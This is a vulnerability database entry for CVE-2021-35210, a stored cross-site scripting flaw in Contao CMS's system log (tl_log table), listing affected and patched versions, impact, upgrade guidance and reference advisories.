CVE-2021-35210
Description
Contao 4.5.x through 4.9.x before 4.9.16, and 4.10.x through 4.11.x before 4.11.5, allows XSS. It is possible to inject code into the tl_log table that will be executed in the browser when the system log is called in the back end.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Contao CMS versions 4.5.x-4.9.15 and 4.10.x-4.11.4 allow stored XSS via the tl_log table, executed in the backend system log.
Vulnerability
Contao CMS versions 4.5.x through 4.9.x before 4.9.16, and 4.10.x through 4.11.x before 4.11.5, contain a stored cross-site scripting (XSS) vulnerability in the tl_log table [1]. An attacker can inject arbitrary JavaScript code into log entries that are stored in this table. When an administrator accesses the system log in the back end, the injected code is executed in the browser [1].
Exploitation
An attacker must be able to write entries to the tl_log table. This could be achieved through other vulnerabilities (e.g., SQL injection) or by having direct database write access. No user interaction beyond the administrator viewing the system log is required for the XSS to trigger [1]. The injected code is stored persistently and executed each time the log is loaded.
Impact
Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of the authenticated administrator's browser session. This can lead to session hijacking, theft of sensitive data, defacement of the back end interface, or further compromise of the Contao installation [1].
Mitigation
Upgrade to Contao version 4.9.16 or 4.11.5 (or any later release) to remediate the vulnerability [1][3][4]. No workaround is documented. The vulnerability is not listed in CISA's Known Exploited Vulnerabilities catalog.
AI Insight generated on May 21, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
contao/core-bundlePackagist | >= 4.5.0, < 4.9.16 | 4.9.16 |
contao/core-bundlePackagist | >= 4.10.0, < 4.11.5 | 4.11.5 |
contao/contaoPackagist | >= 4.5.0, < 4.9.16 | 4.9.16 |
contao/contaoPackagist | >= 4.10.0, < 4.11.5 | 4.11.5 |
Affected products
3- Contao/Contaodescription
- ghsa-coords2 versions
>= 4.5.0, < 4.9.16+ 1 more
- (no CPE)range: >= 4.5.0, < 4.9.16
- (no CPE)range: >= 4.5.0, < 4.9.16
Patches
0No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
6- github.com/advisories/GHSA-h58v-c6rf-g9f7ghsaADVISORY
- nvd.nist.gov/vuln/detail/CVE-2021-35210ghsaADVISORY
- contao.org/en/security-advisories/cross-site-scripting-in-the-system-log-2021.htmlghsax_refsource_CONFIRMWEB
- github.com/FriendsOfPHP/security-advisories/blob/master/contao/contao/CVE-2021-35210.yamlghsaWEB
- github.com/FriendsOfPHP/security-advisories/blob/master/contao/core-bundle/CVE-2021-35210.yamlghsaWEB
- github.com/contao/contao/security/advisories/GHSA-h58v-c6rf-g9f7ghsax_refsource_CONFIRMWEB
News mentions
0No linked articles in our index yet.